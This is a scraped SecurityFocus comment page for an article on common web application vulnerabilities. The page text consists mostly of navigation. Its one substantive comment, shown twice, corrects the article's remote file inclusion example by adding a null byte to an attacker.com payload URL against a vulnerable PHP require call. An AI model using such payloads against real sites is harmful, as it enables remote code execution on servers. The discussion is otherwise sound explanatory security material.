Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Five common Web application vulnerabilities
Sumit Siddharth, Pratiksha Doshi
Comments
Mode:
Threaded
Flat
Expand all
|
Post comment
Five common Web application vulnerabilities
2006-04-28
Anonymous
Five common Web application vulnerabilities
2006-05-01
Anonymous
Five common Web application vulnerabilities
2006-05-05
Anonymous
Five common Web application vulnerabilities
2006-05-09
Anonymous
(1 replies)
There is a typo:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt%00
Some quality control will make you look more professional.
[ reply ]
Link to this comment:
http://www.securityfocus.com/comments/infocus/1864/558#558
Re: Five common Web application vulnerabilities
2006-05-15
Anonymous
Five common Web application vulnerabilities
2006-05-24
Anthony Lai, OWASP (Hong Kong Chapter)
Privacy Statement
Copyright 2007, SecurityFocus
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt%00
Some quality control will make you look more professional.
[ reply ]
Link to this comment: http://www.securityfocus.com/comments/infocus/1864/558#558